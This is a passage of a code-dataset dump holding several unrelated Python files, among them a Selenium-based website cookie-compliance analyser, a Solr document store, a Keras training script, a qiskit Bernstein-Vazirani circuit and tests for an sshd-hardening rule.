    "path",
    "expires_utc",
    "is_secure",
    "is_httponly",
    "has_expires",
    "is_persistent",
    "priority",
    "samesite",
    "source_scheme",
]
# Column order for the per-site statistics CSV export.
HEADER_STATS = [
    "url",
    "total",
    "session",
    "max_exp_days",
    "avg_exp_days",
    "secure_flag",
    "httponly_flag",
    "samesite_none_flag",
    "samesite_lax_flag",
    "samesite_strict_flag",
]
# Root logger; handlers/level are configured by _set_logging().
LOG = logging.getLogger()
def _set_logging():
    """
    Setup logging based on envvars and opinated defaults.

    TRIKI_LOG_LEVEL selects the level (default INFO); setting
    TRIKI_NO_LOG_FILE suppresses the triki.log file handler.
    """
    handlers = [logging.StreamHandler()]
    if not os.getenv("TRIKI_NO_LOG_FILE"):
        handlers.append(logging.FileHandler("triki.log"))
    logging.basicConfig(
        level=os.getenv("TRIKI_LOG_LEVEL", "INFO"),
        format="%(asctime)-15s %(levelname)s: %(message)s",
        handlers=handlers,
    )
def _config():
    """
    Read the sites configuration (accept/reject flows for cookie
    extraction) from config/sites.yaml and return the parsed structure.
    """
    try:
        with open("%s/sites.yaml" % CONFIG_PATH, "r", encoding="utf8") as fh:
            return yaml.load(fh, Loader=yaml.FullLoader)
    except Exception as e:
        LOG.error("Could not load triki configuration: %s", e)
        raise e
def _get_duration_in_days(expires_utc):
    """
    Convert a Chrome cookie expires_utc value (microseconds since
    1601-01-01 UTC) into the number of whole days from now to expiration.

    via: https://stackoverflow.com/questions/43518199/cookies-expiration-time-format
    and https://stackoverflow.com/questions/51343828/how-to-parse-chrome-bookmarks-date-added-value-to-a-date
    """
    chrome_epoch = arrow.get(1601, 1, 1)
    expiration_date = chrome_epoch.shift(microseconds=int(expires_utc))
    return (expiration_date - arrow.utcnow()).days
def _sqlite_dict_factory(cursor, row):
    """sqlite3 row factory mapping each row to a dict keyed by column name."""
    return {column[0]: row[index]
            for index, column in enumerate(cursor.description)}
def get_cookies():
    """
    Read every cookie from the Google Chrome profile's Cookies sqlite
    database, ordered by host and descending expiration, as dicts.
    """
    db = os.path.join(PROFILE_PATH, "Default", "Cookies")
    try:
        conn = sqlite3.connect(db)
        conn.row_factory = _sqlite_dict_factory
        cursor = conn.cursor()
        cursor.execute("SELECT * FROM cookies order by host_key, expires_utc desc")
        rows = cursor.fetchall()
        LOG.info("Encontradas %s cookies", len(rows))
        return rows
    except Exception as e:
        LOG.error("get_cookies: %s", e)
        raise e
def export_cookies(cookies, path):
    """
    Export a list of cookie dicts to a CSV file at *path*.

    Columns follow HEADER_COOKIES; extra keys are ignored and missing keys
    default to 0. Errors are logged and re-raised.

    Fix: the file is opened with newline="" as required by the csv module,
    so row terminators are controlled by the writer (prevents blank rows /
    doubled line endings on Windows). The old docstring also claimed the
    data was pickled; it is written as CSV.
    """
    try:
        with open(path, "w", newline="") as f:
            writer = csv.DictWriter(
                f, fieldnames=HEADER_COOKIES, extrasaction="ignore", restval=0
            )
            writer.writeheader()
            writer.writerows(cookies)
    except Exception as e:
        LOG.error(e)
        raise e
def export_stats(stats, path):
    """
    Export a single site's cookie-statistics dict to a CSV file at *path*.

    Columns follow HEADER_STATS; extra keys are ignored and missing keys
    default to 0. Errors are logged and re-raised.

    Fix: the file is opened with newline="" as required by the csv module,
    so row terminators are controlled by the writer (prevents blank rows /
    doubled line endings on Windows). The old docstring also claimed the
    data was pickled; it is written as CSV.
    """
    try:
        with open(path, "w", newline="") as f:
            writer = csv.DictWriter(
                f, fieldnames=HEADER_STATS, extrasaction="ignore", restval=0
            )
            writer.writeheader()
            writer.writerow(stats)
    except Exception as e:
        LOG.error(e)
        raise e
def cookie_stats(cookies, url):
    """
    Compute summary statistics (counts, expiration horizon, security
    flags, SameSite distribution) for the cookies collected at *url*.
    """
    stats = {"url": url}
    LOG.debug("We have found %s cookies for %s", len(cookies), url)
    stats["total"] = len(cookies)

    # Session cookies are the non-persistent ones.
    session_cookies = [c for c in cookies if not int(c["is_persistent"])]
    LOG.debug("There are %s session cookies", len(session_cookies))
    stats["session"] = len(session_cookies)

    # Expiration horizon in days, over persistent cookies only.
    expirations = [
        _get_duration_in_days(c["expires_utc"])
        for c in cookies
        if int(c["is_persistent"])
    ]
    if expirations:
        stats["max_exp_days"] = max(expirations)
        LOG.debug("max expiration in days is %s", max(expirations))
        stats["avg_exp_days"] = int(round(sum(expirations) / len(expirations)))
        LOG.debug("average expiration in days: %s", stats["avg_exp_days"])
    else:
        stats["max_exp_days"] = 0
        stats["avg_exp_days"] = 0

    # Security attribute counts.
    stats["secure_flag"] = sum(1 for c in cookies if int(c["is_secure"]))
    LOG.debug("There are %s secure cookies", stats["secure_flag"])
    stats["httponly_flag"] = sum(1 for c in cookies if int(c["is_httponly"]))
    LOG.debug("There are %s httpOnly cookies", stats["httponly_flag"])

    # SameSite distribution (-1 = None, 0 = Lax, 1 = Strict in Chrome's schema).
    same_site = Counter(str(c["samesite"]) for c in cookies)
    LOG.debug("same_site %s", same_site)
    stats["samesite_none_flag"] = same_site["-1"]
    stats["samesite_lax_flag"] = same_site["0"]
    stats["samesite_strict_flag"] = same_site["1"]
    LOG.debug(
        "There are %s cookies with SameSite set to None", stats["samesite_none_flag"]
    )
    LOG.debug(
        "There are %s cookies with SameSite set to Lax", stats["samesite_lax_flag"]
    )
    LOG.debug(
        "There are %s cookies with SameSite set to Strict",
        stats["samesite_strict_flag"]
    )
    return stats
def _locate_element(driver, el):
    '''
    Locate an element in the page from locator dict *el*.

    *el* must provide 'by' and 'value' (Selenium locator strategy + query).
    Optional keys: 'multiple' (truthy -> use find_elements) together with
    'match' (lower-cased substring used to pick one element out of the
    candidates by its text).

    Returns the located WebElement, or None when 'multiple' is set and no
    candidate's text contains 'match'. Locator failures are logged and
    re-raised.
    '''
    element = None
    # Check if we expect multiple elements to be selected
    multiple = False
    match = None
    try:
        multiple = el["multiple"]
        match = el["match"].strip().lower()
    except KeyError:
        pass
    # NOTE(review): if 'multiple' is set but 'match' is missing, match stays
    # None and the substring test below raises TypeError -- confirm configs
    # always pair the two keys.
    try:
        if multiple:
            selection = driver.find_elements(el["by"], el["value"])
            LOG.debug("found %s", len(selection))
            # found multiple use match to refine
            if selection and len(selection) >= 1:
                for selected in selection:
                    if match in selected.text.lower():
                        element = selected
                        break
        else:
            element = driver.find_element(el["by"], el["value"])
    except Exception as e:
        LOG.error("Could not locate the element in the page: %s", el)
        raise e
    return element
def screenshot(driver, el, filepath, filename=None):
    """
    Save a PNG screenshot of the element described by *el* (or of the whole
    <body> when *el* is falsy) as banner_cookies_<filename>.png in *filepath*.
    When *filename* is falsy it is derived from the locator value.
    """
    target = el or {"by": "tag name", "value": "body"}
    name = filename or target["value"].replace(".", "_")
    located = _locate_element(driver, target)
    located.screenshot("%s/banner_cookies_%s.png" % (filepath, name))
def navigate_frame(driver, el):
    """
    Switch the driver context into an iframe: by numeric index when *el*
    has an 'index' key, otherwise by locating the frame element.
    """
    if "index" in el:
        driver.switch_to.frame(el["index"])
        return
    driver.switch_to.frame(_locate_element(driver, el))
def click(driver, el):
    """
    Click the element described by locator dict *el*.

    When *el* contains a 'javascript' key the click is performed via
    injected JavaScript after scrolling the element into view. Otherwise a
    native WebDriver click is attempted first, falling back to the
    JavaScript click if another element intercepts it.
    """
    element = _locate_element(driver, el)
    LOG.debug("element: %s", element)
    if "javascript" in el:
        driver.execute_script("arguments[0].scrollIntoView(true);", element)
        driver.execute_script("arguments[0].click();", element)
    else:
        try:
            element.click()
        except ElementClickInterceptedException as e:
            LOG.debug("try click through javascript after exception")
            driver.execute_script("arguments[0].scrollIntoView(true);", element)
            driver.execute_script("arguments[0].click();", element)
def delay(driver, el, value):
    """
    Wait up to *value* seconds for the page.

    With a locator dict *el*: explicit WebDriverWait using the expected
    condition named by el['condition'] (element_to_be_clickable when
    absent); on timeout the TimeoutException is logged and re-raised.
    Without *el*: sets an implicit wait of *value* seconds on the driver.
    """
    # Whitelist of supported selenium expected conditions.
    TRIKI_AVAILABLE_CONDITIONS = {
        "element_to_be_clickable": EC.element_to_be_clickable,
        "presence_of_element_located": EC.presence_of_element_located,
        "visibility_of_element_located": EC.visibility_of_element_located,
    }
    if el:
        if "condition" in el:
            expected_condition_method = TRIKI_AVAILABLE_CONDITIONS[el["condition"]]
        else:
            expected_condition_method = EC.element_to_be_clickable
        try:
            WebDriverWait(driver, value).until(
                expected_condition_method((el["by"], el["value"]))
            )
        except TimeoutException as e:
            LOG.info("Timeout for explicit wait on %s", el)
            raise e
    else:
        driver.implicitly_wait(value)
def keys(driver, el, value):
    """
    Clear the form element described by *el* and type *value* into it.
    """
    field = _locate_element(driver, el)
    field.clear()
    field.send_keys(value)
def submit(driver, el):
    """
    Submit the form containing the element described by *el*.
    """
    _locate_element(driver, el).submit()
def execute_cookies_flow(site, site_path, hostname):
    """
    Navigates to a site and depending on the selected flow
    accepts or rejects all the cookies and stores results, screenshots
    and statistics on the cookies for the site.

    site      -- site configuration dict (url, flow, flow_type, options);
                 NOTE: site["flow_type"] is mutated below when blocking
                 options are enabled, so suffixes accumulate across calls
                 that reuse the same dict.
    site_path -- output directory for screenshots/CSVs (created if missing)
    hostname  -- hostname used to build the output file names
    """
    # Dispatch table mapping flow step names to the action functions above.
    TRIKI_AVAILABLE_ACTIONS = {
        "screenshot": screenshot,
        "navigate_frame": navigate_frame,
        "click": click,
        "delay": delay,
        "sleep": sleep,
        "keys": keys,
        "submit": submit,
    }
    # Clear profile to start fresh always
    if os.path.exists(PROFILE_PATH):
        rmtree(PROFILE_PATH)
    os.makedirs(PROFILE_PATH)
    # Selenium Chrome initialization with a dedicated profile
    opts = ChromeOptions()
    # Headless mode is disabled: it seems not to create the Cookies sqlite db
    # opts.add_argument("--headless")
    opts.add_argument("user-data-dir=%s" % PROFILE_PATH)
    prefs = {}
    # Force browser language
    if "language" in site:
        prefs["intl.accept_languages"] = site["language"]
    else:
        # Defaults to spanish
        prefs["intl.accept_languages"] = "es, es-ES"
    # Try to block cookies
    # 1: allow, 2: block
    # via: https://stackoverflow.com/questions/32381946/disabling-cookies-in-webdriver-for-chrome-firefox/32416545
    if "block_all_cookies" in site:
        prefs["profile.default_content_setting_values.cookies"] = 2
        site["flow_type"] += "_block_all"
    # Try to block third party cookies
    if "block_third_party_cookies" in site:
        prefs["profile.block_third_party_cookies"] = True
        site["flow_type"] += "_block_third_party"
    # Send the Do-Not-Track header
    if "enable_do_not_track" in site:
        prefs["enable_do_not_track"] = True
        site["flow_type"] += "_do_not_track"
    opts.add_experimental_option("prefs", prefs)
    # Fix window size so screenshots are consistent across runs
    opts.add_argument("window-size=1920,1080")
    opts.add_argument("--log-level=3")
    driver = Chrome(options=opts)
    try:
        LOG.info("Analysing %s %sing all cookies", site["url"], site["flow_type"])
        driver.get(site["url"])
        if not os.path.exists(site_path):
            os.makedirs(site_path)
        # Replay each configured step; argument shape depends on the action.
        for step in site["flow"]:
            function = TRIKI_AVAILABLE_ACTIONS[step["action"]]
            if step["action"] == "screenshot":
                if "filename" not in step:
                    step["filename"] = None
                function(driver, step["element"], site_path, step["filename"])
            elif step["action"] == "navigate_frame":
                function(driver, step["element"])
            elif step["action"] == "click":
                function(driver, step["element"])
            elif step["action"] == "submit":
                function(driver, step["element"])
            elif step["action"] == "keys":
                function(driver, step["element"], step["value"])
            elif step["action"] == "delay":
                function(driver, step["element"], step["value"])
            elif step["action"] == "sleep":
                function(step["value"])
            LOG.info("done with step: %s", step)
    except Exception as e:
        LOG.error("Exception while processing flow %s", e)
        raise
    finally:
        driver.close()
    # Retrieve and compute stats over the site cookies
    # Generate paths
    cookies_path = "%s/cookies_%s_%s.csv" % (
        site_path,
        site["flow_type"],
        hostname.replace(".", "_"),
    )
    stats_path = "%s/stats_%s_%s.csv" % (
        site_path,
        site["flow_type"],
        hostname.replace(".", "_"),
    )
    # Retrieve cookies from sqlite
    cookies = get_cookies()
    LOG.debug(cookies)
    # Export cookies to csv
    export_cookies(cookies, cookies_path)
    # Compute cookie stats
    stats = cookie_stats(cookies, site["url"])
    # Export cookie stats to csv
    export_stats(stats, stats_path)
def run():
    """
    Analyze cookies for every site listed in the configuration.

    Per-site failures are logged and skipped so one broken site does not
    abort the whole run; Ctrl-C / SystemExit still stop everything.
    """
    # Configure logging
    _set_logging()
    # Create output folders if needed
    if not os.path.exists(DATA_PATH):
        os.makedirs(DATA_PATH)
    # Read sites configuration
    config = _config()
    for site in config["sites"]:
        try:
            LOG.debug(site)
            today = arrow.utcnow().format("YYYYMMDD")
            url = urlparse(site["url"])
            # Outputs grouped per hostname and per day.
            site_path = os.path.join(DATA_PATH, url.hostname, today)
            execute_cookies_flow(site, site_path, url.hostname)
        except (KeyboardInterrupt, SystemExit):
            sys.exit()
        except Exception as e:
            # Best-effort: log and continue with the next site.
            LOG.error("Found error while processing %s", site["url"])
        # Delete last profile from selenium execution adding more time for windows
        if platform.system() == "Windows":
            sleep(20)
        if os.path.exists(PROFILE_PATH):
            rmtree(PROFILE_PATH)
# Entry point: run the full cookie-analysis flow for every configured site.
if __name__ == "__main__":
    run()
| StarcoderdataPython |
4831766 | <filename>realsense/img2video.py
import cv2
import argparse
import os
import numpy as np
from tqdm import tqdm
if __name__ == '__main__':
    # Assemble every image under --img-root into a single video file.
    parser = argparse.ArgumentParser()
    parser.add_argument('--img-root', type=str, default='rs/JPEGImages')
    parser.add_argument('--fps', type=int, default=30)
    # BUG FIX: the default was a tuple but argparse parsed any CLI value as a
    # single string, so --size could never actually be used. Accept two ints.
    parser.add_argument('--size', type=int, nargs=2, default=(640, 480),
                        metavar=('WIDTH', 'HEIGHT'))
    parser.add_argument('--video-name', default='video.avi')
    args = parser.parse_args()

    assert os.path.exists(args.img_root)
    size = tuple(args.size)  # cv2 expects a (width, height) tuple

    # Sort so frame order is deterministic (os.listdir order is arbitrary).
    filelist = sorted(os.listdir(args.img_root))
    video = cv2.VideoWriter(args.video_name,
                            cv2.VideoWriter_fourcc('I', '4', '2', '0'),
                            args.fps, size)
    for item in tqdm(filelist):
        if item.split('.')[-1].lower() in ('jpg', 'png', 'jpeg'):
            img = cv2.imread(os.path.join(args.img_root, item))
            if img is None:
                # Unreadable/corrupt image: skip instead of crashing in resize.
                continue
            video.write(cv2.resize(img, size))
    video.release()
    cv2.destroyAllWindows()
    print('The video in this path: {}'.format(os.getcwd() + '/' + args.video_name))
| StarcoderdataPython |
6614350 | # Django
from django.db import models
class ShiftType(models.Model):
    """Shift Types model.

    List of Shift types, used by users and clients.
    """

    # 'shift type' is the field's verbose name (shown in forms/admin),
    # not a default value.
    name = models.CharField('shift type', max_length=100)

    def __str__(self):
        # Display shift types by name in the admin and shell.
        return self.name
| StarcoderdataPython |
9632708 | <reponame>eaudeweb/natura2000db<filename>naturasites/storage.py
import os.path
import json
import re
import logging
import urllib
import urllib2
import errno
from contextlib import contextmanager
from collections import namedtuple
import flask
import schema
log = logging.getLogger(__name__)
class StorageError(Exception):
    """Base class for storage backend failures."""
    pass


class NotFound(StorageError):
    """Raised when a requested document does not exist in the backend."""
    pass
# Maximum number of rows requested from Solr per query.
QUERY_ROWS = 1000

# (docs, facets) pair returned by SolrStorage.solr_query.
SolrAnswer = namedtuple('SolrAnswer', ['docs', 'facets'])
# A single facet entry: value name and its document count.
FacetItem = namedtuple('FacetItem', ['name', 'count'])


class Or(list):
    """ Marker class used to ask for the 'or' query operation """


And = list  # the 'and' query operation is default


class AllowWildcards(unicode):
    """ don't quote the wildcard character """
class FsStorage(object):
    """Document store backed by one JSON file per document on disk."""

    def __init__(self, storage_path):
        self.storage_path = storage_path

    def _doc_path(self, doc_id):
        """Absolute path of the JSON file holding document *doc_id*."""
        return os.path.join(self.storage_path, 'doc_%d.json' % int(doc_id))

    def save_document(self, doc_id, doc):
        """Persist *doc* under *doc_id* (auto-assigned when None); return the id."""
        if doc_id is None:
            # Next free id: one past the current maximum, starting at 0.
            doc_id = max([-1] + self.document_ids()) + 1
        else:
            doc_id = int(doc_id)
        log.info("saving document %r", doc_id)
        with open(self._doc_path(doc_id), 'wb') as f:
            json.dump(doc.value, f, indent=2)
        return doc_id

    def load_document(self, doc_id):
        """Read document *doc_id* back as a schema.SpaDoc."""
        with open(self._doc_path(int(doc_id)), 'rb') as f:
            return schema.SpaDoc(json.load(f))

    def document_ids(self):
        """Sorted ids of every ``doc_<n>.json`` file in the storage directory."""
        ids = []
        for name in os.listdir(self.storage_path):
            match = re.match(r'^doc_(?P<doc_id>\d+)\.json$', name)
            if match:
                ids.append(int(match.group('doc_id')))
        return sorted(ids)
# Characters that carry special meaning in Solr query syntax.
_solr_text_pattern = re.compile(r'([\\+\-&|!(){}[\]^~*?:"; ])')
# Same set minus '*', so wildcard searches can pass through unescaped.
_solr_text_wildcards_ok_pattern = re.compile(r'([\\+\-&|!(){}[\]^~?:"; ])')


def quote_solr_text(text, wildcards_ok=False):
    """Backslash-escape Solr special characters in *text*.

    When *wildcards_ok* is true, the ``*`` character is left intact.
    """
    chosen = _solr_text_wildcards_ok_pattern if wildcards_ok else _solr_text_pattern
    return chosen.sub(r'\\\1', text)
def quote_solr_query(value, op=u' AND '):
    """Recursively render a query structure into an escaped Solr query string.

    Accepts strings (escaped text), Or/lists (joined with OR/AND), dicts and
    2-tuples (field:value pairs). Empty values collapse to u''.

    NOTE: the isinstance order below is significant — AllowWildcards must be
    tested before unicode, and Or before And (Or subclasses list, And IS list).
    """
    if isinstance(value, str):
        value = unicode(value)
    if isinstance(value, AllowWildcards):
        return quote_solr_text(value, wildcards_ok=True)
    elif isinstance(value, unicode):
        return quote_solr_text(value) if value else u''
    elif isinstance(value, Or):
        # Re-dispatch as a plain list joined with OR.
        return quote_solr_query(list(value), op=u' OR ')
    elif isinstance(value, And):
        quoted = filter(None, map(quote_solr_query, value))
        return u'(%s)' % (op.join(quoted),) if quoted else u''
    elif isinstance(value, dict):
        quoted = filter(None, map(quote_solr_query, value.iteritems()))
        return u'(%s)' % (op.join(quoted),) if quoted else u''
    elif isinstance(value, tuple) and len(value) == 2:
        # (field, value) pair; an empty value drops the whole clause.
        k, v = value
        if not v:
            return u''
        return u'(%s:%s)' % (quote_solr_query(k), quote_solr_query(v))
    else:
        raise ValueError("Can't quote value of type %r" % type(value))
class SolrStorage(object):
    """Document store backed by a Solr index; the raw document is kept in
    the 'orig' field as JSON so it can be fully reconstructed."""

    solr_base_url = 'http://localhost:8983/solr/'

    def _solr_doc(self, doc):
        """Flatten *doc* into the dict shape Solr's JSON update API expects."""
        data = doc.value
        solr_doc = {
            'id': data['section1']['code'],
            'name': data['section1']['name'],
            'orig': json.dumps(data),
        }
        # Index every searchable field declared by the schema.
        for element in schema.Search().all_children:
            value = element.properties['index'](doc)
            log.debug('index %s: %r', element.name, value)
            solr_doc[element.name] = value
        return solr_doc

    @contextmanager
    def solr_http(self, request):
        """Open *request* (URL string or urllib2.Request) against Solr and
        yield the response, closing it afterwards.

        Raises StorageError when the connection is refused (message is
        Romanian: "connection cannot be established").
        """
        if isinstance(request, urllib2.Request):
            url = request.get_full_url()
        else:
            url = request
        log.debug("Solr request to url %r", url)
        try:
            response = urllib2.urlopen(request)
        except urllib2.URLError, e:
            if hasattr(e, 'reason') and e.reason.errno == errno.ECONNREFUSED:
                raise StorageError("Nu se poate stabili conexiunea")
            else:
                raise
        try:
            yield response
        finally:
            response.close()

    def solr_query(self, query, args=[]):
        """Run *query* and return a SolrAnswer(docs, facets).

        NOTE(review): args=[] is a mutable default; harmless here since it
        is only concatenated, never mutated.
        """
        full_args = [('q', query.encode('utf-8'))] + args + [
            ('wt', 'json'),
            ('rows', str(QUERY_ROWS)),
        ]
        url = self.solr_base_url + 'select?' + urllib.urlencode(full_args)
        with self.solr_http(url) as http_response:
            answer = json.load(http_response)
        num_found = answer['response']['numFound']
        if num_found > QUERY_ROWS:
            # Results beyond QUERY_ROWS are silently dropped; only warn.
            log.warn("Found more results than expected: %d > %d",
                     num_found, QUERY_ROWS)

        def pairs(values):
            # Solr returns facets as a flat [name, count, name, count, ...]
            # list; regroup it into (name, count) pairs.
            values = iter(values)
            while True:
                yield values.next(), values.next()

        facets = {}
        if 'facet_counts' in answer:
            for name, values in answer['facet_counts']['facet_fields'].iteritems():
                facets[name] = [FacetItem(*p) for p in pairs(values) if p[1] > 0]
        return SolrAnswer(answer['response']['docs'], facets)

    def save_document(self, doc_id, doc):
        """Index a single document; *doc_id* is ignored (the id comes from
        the document's own section1.code)."""
        return self.save_document_batch([doc])[0]

    def save_document_batch(self, batch):
        """Index a list of documents in one commit; return their codes."""
        url = self.solr_base_url + 'update/json?commit=true'
        request = urllib2.Request(url)
        request.add_header('Content-Type', 'application/json')
        request.add_data(json.dumps([self._solr_doc(doc) for doc in batch]))
        with self.solr_http(request) as response:
            response.read()
        return [doc['section1']['code'].value for doc in batch]

    def load_document(self, doc_id):
        """Fetch one document by id; raises NotFound when missing."""
        docs = self.solr_query('id:%s' % doc_id).docs
        if not docs:
            raise NotFound()
        doc = docs[0]
        return schema.SpaDoc(json.loads(doc['orig']))

    def document_ids(self):
        """Sorted ids of every indexed document."""
        return sorted([d['id'] for d in self.solr_query('*').docs])

    def search(self, criteria, get_data=False, facets=False):
        """Search by *criteria* (see quote_solr_query); optionally request
        facet counts and/or the full original document data."""
        query = quote_solr_query(criteria)
        if not query:
            query = '*:*'
        log.debug('Solr query %r', query)
        args = []
        if facets:
            args.append( ('facet', 'true') )
            for element in schema.Search().all_children:
                if element.properties.get('facet', False):
                    args.append( ('facet.field', element.name) )
        want_fields = ['id', 'name']
        if get_data:
            want_fields.append('orig')
        args.append( ('fl', ','.join(want_fields)) )
        answer = self.solr_query(query, args)
        docs = [{
            'id': r['id'],
            'name': r['name'],
            'data': json.loads(r.get('orig', '{}')),
        } for r in answer.docs]
        return {
            'docs': docs,
            'facets': answer.facets,
        }
def get_db(app=None):
    """Return the storage backend selected by the app's STORAGE_ENGINE
    setting ('solr' or 'filesystem'); defaults to the current Flask app."""
    if app is None:
        app = flask.current_app
    engine_name = app.config['STORAGE_ENGINE']
    if engine_name == 'solr':
        return SolrStorage()
    if engine_name == 'filesystem':
        return FsStorage(app.config['STORAGE_FS_PATH'])
    raise ValueError('Unknown storage engine %r' % engine_name)
| StarcoderdataPython |
1838578 | """
TODO
"""
from selenium.webdriver.common.by import By
from .base import BasePageLocators
# pylint: disable=too-few-public-methods
class AccountLocators(BasePageLocators):
    """
    Selenium locators for the customer account page.
    """

    # (strategy, selector) pairs consumed as driver.find_element(*locator).
    ADDRESS_BOOK_LINK = (By.LINK_TEXT, "Address Book")
    EDIT_ACCOUNT_LINK = (By.XPATH, "//div[@id='content']//a[.='Edit Account']")
    YOUR_STORE_LINK = (By.LINK_TEXT, "Your Store")
| StarcoderdataPython |
9663651 | <reponame>bpiwowar/TexSoup
from TexSoup.reader import read_expr, read_tex
from TexSoup.data import *
from TexSoup.utils import *
from TexSoup.tokens import tokenize
from TexSoup.category import categorize
import itertools
def read(tex, skip_envs=(), tolerance=0):
    """Read and parse all LaTeX source.

    :param Union[str,iterable] tex: LaTeX source
    :param Union[str] skip_envs: names of environments to skip parsing
    :param int tolerance: error tolerance level (only supports 0 or 1)
    :return TexEnv: the global environment
    """
    if not isinstance(tex, str):
        # Flatten an iterable of strings into one source string.
        tex = ''.join(itertools.chain.from_iterable(tex))
    # Pipeline: characters -> categories -> tokens -> expression tree.
    parsed = read_tex(tokenize(categorize(tex)),
                      skip_envs=skip_envs, tolerance=tolerance)
    return TexEnv('[tex]', begin='', end='', contents=parsed), tex
| StarcoderdataPython |
4892376 | import os
import sys
import glob
import re
import h5py
os.environ['KERAS_BACKEND'] = 'tensorflow'
import setGPU
from keras.callbacks import EarlyStopping, ModelCheckpoint
if __package__ is None:
sys.path.append(os.path.realpath("/data/shared/Software/CMS_Deep_Learning"))
from CMS_Deep_Learning.io import gen_from_data, retrieve_data
if __package__ is None:
sys.path.append(os.path.realpath("/data/shared/Software/RegressionLCD"))
from model import *
from preprocessing import *
from analysis import *
# Run identifier; used for the checkpoint file and the saved loss history.
mName = 'fix_chPi_dnn'
model = dnnModel(modName=mName)

# Directories containing the pre-split HDF5 data.
train_dir = "/bigdata/shared/LCD2018/ChPiEscan/train/"
valid_dir = "/bigdata/shared/LCD2018/ChPiEscan/val/"
# test_dir = "/bigdata/shared/LCD2018/ChPiEscan/test/"

# Total number of samples per split (drives generator epoch sizes).
tr_samples = nSamples(train_dir)
val_samples = nSamples(valid_dir)

# Batch generators yielding ([ECAL, HCAL], energy) pairs.
train = gen_from_data(train_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])
val = gen_from_data(valid_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])
# NOTE(review): this reads valid_dir, not the (commented-out) test_dir —
# confirm whether a separate test split was intended.
test = gen_from_data(valid_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])

# Train with early stopping and best-only checkpointing on validation loss.
checkpoint_path = '/nfshome/vitoriabp/gpu-4-culture-plate-sm/new_ds_notebooks/' + mName + '.h5'
hist = model.fit_generator(
    train,
    samples_per_epoch=tr_samples,
    nb_epoch=50,
    validation_data=val,
    nb_val_samples=val_samples,
    verbose=1,
    callbacks=[
        EarlyStopping(monitor='val_loss', patience=8, verbose=1, mode='min'),
        ModelCheckpoint(filepath=checkpoint_path, monitor='val_loss',
                        verbose=0, save_best_only=True, mode='min'),
    ],
)

# BUG FIX: the literal string "mName" was passed previously, so every run's
# losses were saved under the same name; pass the run identifier variable.
saveLosses(hist, name=mName)
show_losses([("chPi", hist)])
| StarcoderdataPython |
4806863 | import qiskit
from qiskit import *
from qiskit.tools.visualization import plot_histogram
# Bernstein-Vazirani-style circuit: recovers a hidden bit string in one query.
secretnumber = input("Enter Secret number")

# One qubit per secret bit plus an ancilla; classical bits for the readout.
circuit = QuantumCircuit(len(secretnumber)+1, len(secretnumber))
# Put the input register into uniform superposition.
circuit.h(range(len(secretnumber)))
# Prepare the ancilla in |-> (X then H) so the oracle kicks back phases.
circuit.x(len(secretnumber))
circuit.h(len(secretnumber))
circuit.barrier()
# Oracle: CNOT onto the ancilla from every qubit whose secret bit is '1'.
# The string is reversed so bit 0 of the secret maps to qubit 0.
for ii,yesno in enumerate(reversed(secretnumber)):
    if yesno == "1":
        circuit.cx(ii,len(secretnumber))
circuit.barrier()
# Undo the superposition; measuring now yields the secret deterministically.
circuit.h(range(len(secretnumber)))
circuit.barrier()
circuit.measure(range(len(secretnumber)), range(len(secretnumber)))

# A single shot suffices because the outcome is deterministic.
simulator = Aer.get_backend('qasm_simulator')
result = execute(circuit, backend= simulator, shots=1).result()
counts = result.get_counts()
print(counts)
plot_histogram(counts)
| StarcoderdataPython |
6653359 | #! /usr/bin/env python
class Colours(dict):
    """ANSI terminal colour helper.

    Subclasses dict for backwards compatibility with callers that treat it
    as a mapping; the escape codes themselves live as instance attributes.
    """

    def __init__(self):
        # BUG FIX: the original called dict.__init__(dict(self)), which
        # initialised a throwaway copy instead of this instance.
        super(Colours, self).__init__()
        self.yellow = '\033[93m'
        self.green = '\033[92m'
        self.red = '\033[91m'
        self.reset = '\033[0m'

    def to_yellow(self, message):
        """Wrap *message* in yellow escape codes."""
        return self.yellow + message + self.reset

    def to_green(self, message):
        """Wrap *message* in green escape codes."""
        return self.green + message + self.reset

    def to_red(self, message):
        """Wrap *message* in red escape codes."""
        return self.red + message + self.reset


# Shared module-level instance.
COLOURS = Colours()
| StarcoderdataPython |
9685461 | from rules import sshd_secure
from insights.tests import InputData, archive_provider, context_wrap
from insights.core.plugins import make_response
from insights.specs import Specs
# The following imports are not necessary for integration tests
from insights.parsers.secure_shell import SshDConfig
# Installed-rpms fixture: two openssh versions; the rule should report the
# newer one (see EXPECTED_OPENSSH below).
OPENSSH_RPM = """
openssh-6.6.1p1-31.el7.x86_64
openssh-6.5.1p1-31.el7.x86_64
""".strip()

EXPECTED_OPENSSH = "openssh-6.6.1p1-31.el7"

# sshd_config fixture that satisfies every check (no response expected).
GOOD_CONFIG = """
AuthenticationMethods publickey
LogLevel VERBOSE
PermitRootLogin No
# Protocol 2
""".strip()

# sshd_config fixture that violates every check.
BAD_CONFIG = """
AuthenticationMethods badkey
LogLevel normal
PermitRootLogin Yes
Protocol 1
""".strip()

# Empty config: every option falls back to its (insecure) default.
DEFAULT_CONFIG = """
# All default config values
""".strip()
def test_check_auth_method():
    """
    This is an example of using unit tests with integration tests.

    Although integration tests should also test this function,
    if problems exist it may be easier to find if you write unit
    tests like these.
    """
    # Bad value is reported back verbatim.
    errors = {}
    sshd_config = SshDConfig(context_wrap(BAD_CONFIG))
    errors = sshd_secure.check_auth_method(sshd_config, errors)
    assert errors == {'AuthenticationMethods': 'badkey'}
    # Good value produces no error entry.
    errors = {}
    sshd_config = SshDConfig(context_wrap(GOOD_CONFIG))
    errors = sshd_secure.check_auth_method(sshd_config, errors)
    assert errors == {}
    # Missing option is flagged as 'default'.
    errors = {}
    sshd_config = SshDConfig(context_wrap(DEFAULT_CONFIG))
    errors = sshd_secure.check_auth_method(sshd_config, errors)
    assert errors == {'AuthenticationMethods': 'default'}
@archive_provider(sshd_secure.report)
def integration_tests():
    """
    InputData acts as the data source for the parsers
    so that they may execute and then be used as input
    to the rule. So this is essentially an end-to-end
    test of the component chain.

    Yields (input_data, expected_response) pairs; None means the rule
    should produce no response for that input.
    """
    # Compliant config: no response expected.
    input_data = InputData("GOOD_CONFIG")
    input_data.add(Specs.sshd_config, GOOD_CONFIG)
    input_data.add(Specs.installed_rpms, OPENSSH_RPM)
    yield input_data, None

    # Every option violated: each one shows up in the errors dict.
    input_data = InputData("BAD_CONFIG")
    input_data.add(Specs.sshd_config, BAD_CONFIG)
